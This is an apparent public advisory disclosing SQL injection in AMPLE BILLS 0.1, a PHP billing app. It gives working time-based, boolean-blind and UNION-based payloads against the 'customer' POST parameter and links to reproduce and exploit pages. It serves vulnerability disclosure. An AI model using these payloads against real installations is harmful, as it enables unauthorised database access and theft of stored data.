AMPLE BILLS 0.1 Multiple-SQLi
2024-4-15 00:42:7 Author: cxsecurity.com(查看原文) 阅读量:4 收藏

AMPLE BILLS 0.1 Multiple-SQLi

## Title: AMPLE BILLS 0.1 Multiple-SQLi ## Author: nu11secur1ty ## Date: 04/13/2024 ## Vendor: https://www.mayurik.com/ ## Software: https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The customer parameter (#1*) appears to be vulnerable to SQL injection attacks. The payload (select*from(select(sleep(20)))a) was submitted in the customer parameter. The application took 20017 milliseconds to respond to the request, compared with 4 milliseconds for the original request, indicating that the injected SQL command caused a time delay. The database appears to be MySQL. The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Payload: ```mysql --- Parameter: #1* ((custom) POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: customer=(-2876) OR 5249=5249#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024 Type: UNION query Title: MySQL UNION query (random number) - 1 column Payload: customer=(-8147) UNION ALL SELECT CONCAT(0x7178627671,0x456d507450425279564f614b766957634d464a6c63536e6f63464953467254446171427a754e5769,0x7176626271),7839,7839,7839,7839#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024 --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/AMPLE-BILLS-0.1) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/04/ample-bills-01-multiple-sqli.html) ## Time spent: 01:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2024040026
如有侵权请联系:admin#unsafe.sh